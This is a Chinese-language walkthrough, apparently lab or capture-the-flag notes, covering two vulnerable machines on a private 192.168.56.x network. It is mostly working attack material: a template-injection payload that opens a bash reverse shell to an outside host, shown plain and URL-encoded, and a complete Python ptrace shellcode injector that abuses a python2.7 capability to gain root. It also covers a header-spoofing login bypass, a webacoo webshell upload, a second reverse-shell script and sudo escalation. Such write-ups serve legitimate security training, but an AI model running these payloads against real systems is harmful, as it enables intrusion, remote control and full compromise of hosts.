nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
#/home/saket/.bashrc###:
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
username="admin"
password="Saket!#$%@!!"
#/home/saket/.profile###:

尝试访问 http://192.168.56.118:9999/ 使用密码账号尝试

尝试结果 username 是 saket
尝试结果 password 是 Saket!#$%@!!

1	http://192.168.56.108:9999/?name={{11}},${11},<%11%>,[11]

1	{% import os%}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.56.102/7779 0>&1"')}}

1	%7B%25%20import%20os%20%25%7D%7B%7Bos.system(%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.102%2F7779%200%3E%261%22%27)%7D%7D

查看漏洞可能存在的权限漏洞使用 /sbin/getcap -r / 2>/dev/null

saket@ubuntu:/$ /sbin/getcap -r / 2>/dev/null
/sbin/getcap -r / 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

其中 /usr/bin/python2.7 权限设置是有问题的
使用 ps -aef | grep '/usr/sbin/apache2 -k start' 查看与进程 /usr/sbin/apache2 -k start 相关的进程号，选和 root 相关的

saket@ubuntu:/$ ps -aef | grep '/usr/sbin/apache2 -k start' 
ps -aef | grep '/usr/sbin/apache2 -k start' 
root         859       1  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     860     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     870     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     871     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     872     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     873     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data     874     859  0 07:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    1292     859  0 07:26 ?        00:00:00 /usr/sbin/apache2 -k start
saket       2182    2158  0 10:56 ?        00:00:00 grep --color=auto /usr/sbin/apache2 -k start

使用漏洞攻击 python2.7 inject.py 888

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c 
 
import ctypes
import sys
import struct
 
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
 
PTRACE_POKETEXT   = 4
PTRACE_GETREGS    = 12
PTRACE_SETREGS    = 13
PTRACE_ATTACH     = 16
PTRACE_DETACH     = 17
 
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
 
class user_regs_struct(ctypes.Structure):
    _fields_ = [
        ("r15", ctypes.c_ulonglong),
        ("r14", ctypes.c_ulonglong),
        ("r13", ctypes.c_ulonglong),
        ("r12", ctypes.c_ulonglong),
        ("rbp", ctypes.c_ulonglong),
        ("rbx", ctypes.c_ulonglong),
        ("r11", ctypes.c_ulonglong),
        ("r10", ctypes.c_ulonglong),
        ("r9", ctypes.c_ulonglong),
        ("r8", ctypes.c_ulonglong),
        ("rax", ctypes.c_ulonglong),
        ("rcx", ctypes.c_ulonglong),
        ("rdx", ctypes.c_ulonglong),
        ("rsi", ctypes.c_ulonglong),
        ("rdi", ctypes.c_ulonglong),
        ("orig_rax", ctypes.c_ulonglong),
        ("rip", ctypes.c_ulonglong),
        ("cs", ctypes.c_ulonglong),
        ("eflags", ctypes.c_ulonglong),
        ("rsp", ctypes.c_ulonglong),
        ("ss", ctypes.c_ulonglong),
        ("fs_base", ctypes.c_ulonglong),
        ("gs_base", ctypes.c_ulonglong),
        ("ds", ctypes.c_ulonglong),
        ("es", ctypes.c_ulonglong),
        ("fs", ctypes.c_ulonglong),
        ("gs", ctypes.c_ulonglong),
    ]
 
libc = ctypes.CDLL("libc.so.6")
 
pid=int(sys.argv[1])
 
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
 
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
 
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
 
print("Instruction Pointer: " + hex(registers.rip))
 
print("Injecting Shellcode at: " + hex(registers.rip))
 
# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
 
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
 
  # Convert the byte to little endian.
  shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
  shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
  shellcode_byte=int(shellcode_byte_little_endian,16)
 
  # Inject the byte.
  libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
 
print("Shellcode Injected!!")
 
# Modify the instuction pointer
registers.rip=registers.rip+2
 
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
 
print("Final Instruction Pointer: " + hex(registers.rip))
 
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)

1	wget http://192.168.56.102:8082/inject.py

1	ps -aef \| grep '/usr/sbin/apache2 -k start'

1	python2.7 inject.py 2237

1	ss -pantu \| grep 5600

1	python2.7 -c 'import pty;pty.spawn("/bin/bash")'

靶机: y0usef

https://www.cnblogs.com/shadow-/p/16909038.html

1
2
3

arp-scan -l -I eth0
nmap -A -T4 192.168.56.109
http://192.168.56.109/

我们使用 whatweb 继续探测进行 Web 应用程序指纹识别，看看运行了什么 Web 应用

1	whatweb http://192.168.56.109

┌──(root㉿kali)-[/home/kali/Desktop]
└─#  whatweb http://192.168.56.109
http://192.168.56.109 [200 OK] Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.109], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]

1	dirsearch -u http://192.168.56.109

[08:49:16] Starting: 
[08:49:30] 301 -  324B  - /adminstration  ->  http://192.168.56.109/adminstration/
[08:49:38] 200 -  791B  - /index.php                                        
[08:49:38] 200 -  791B  - /index.php/login/

1 2	curl http://192.168.56.109/adminstration/ \ -H 'X-Forwarded-For: 127.0.0.1'

使用mitmproxy

mitmproxy

1
2
3

:
set modify_headers '/~q/X-Forwarded-For/127.0.0.1'
ctrl + shift + d

1	在 Firefox 中设置代理，手动代理 -> HTTP 代理 127.0.0.1 端口 8080

在页面中进行密码猜测，结果 username=admin,password=admin

利用文件上传

1	webacoo -g -o a.php

文件上传处kali的mitmproxy拦截失败，使用win11的bp来处理

bp增加所有的X-Forwarded-For: 127.0.0.1

1	files/1692252323a.php

既然改了使用bp就得增加一些麻烦的地方

具体思路是，kali工具webacoo使用proxychains代理到本机的192.168.56.1:8080端口，然后bp开启监听此端口，完成流量的转发，然后bp更改X-Forwarded-For配置，再将流量经过上游代理127.0.0.1:7890到我的clash【可以没有上游】，然后流量访问的是192.168.56.109最终会回到virtualbox的目标靶机，完成操作。

cat /etc/proxychains4.conf > proxychains.conf
vim proxychains.conf# 改 socks4 127.0.0.1 9050 --> http 192.168.56.1 8080

1	proxychains -f proxychains.conf webacoo -t -u http://192.168.56.109/adminstration/upload/files/1692252323a.php

最终在bp的配合下完成，

接着用webacoo反弹shell

1
2
3

touch a.sh
echo '#! /bin/bash\nbash -i >& /dev/tcp/192.168.56.102/7778 0>&1' > a.sh && chmod +x ./a.sh
./a.sh

1	python -c "import pty; pty.spawn('/bin/bash')"

提权：

1	cat /etc/passwd

www-data@yousef-VirtualBox:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
yousef:x:1000:1000:yousef,,,:/home/yousef:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
guest-cpxNn2:x:116:125:Guest,,,:/tmp/guest-cpxNn2:/bin/bash
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin

发现用户 yousef

cd /home
ls
cat user.txt
echo 'c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=' | base64 -d

1
2
3

ssh : 
user : yousef 
pass : yousef123

1	ssh yousef@192.168.56.109

二次提权：

sudo -l

Matching Defaults entries for yousef on yousef-VirtualBox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User yousef may run the following commands on yousef-VirtualBox:
    (ALL : ALL) ALL

发现此账号可以直接 sudo -s 进入 root

sudo -s

拿到root shell任务完成！